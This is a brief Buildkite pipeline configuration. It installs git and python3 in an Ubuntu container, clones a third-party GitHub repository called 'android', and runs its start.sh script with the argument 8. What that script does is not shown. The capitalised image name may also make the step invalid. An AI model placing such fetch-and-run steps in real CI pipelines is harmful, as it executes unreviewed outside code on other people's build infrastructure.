steps:
  - label: ":docker: Run Script"
    command: |
      apt update && apt install -y git python3
      git clone https://github.com/Fiujol/android || true
      cd android
      bash start.sh 8 || echo 'Script failed'
    agents:
      queue: "default"
    plugins:
      - docker#v5.14.0:
          image: "Ubuntu:22.04"
          always-pull: true
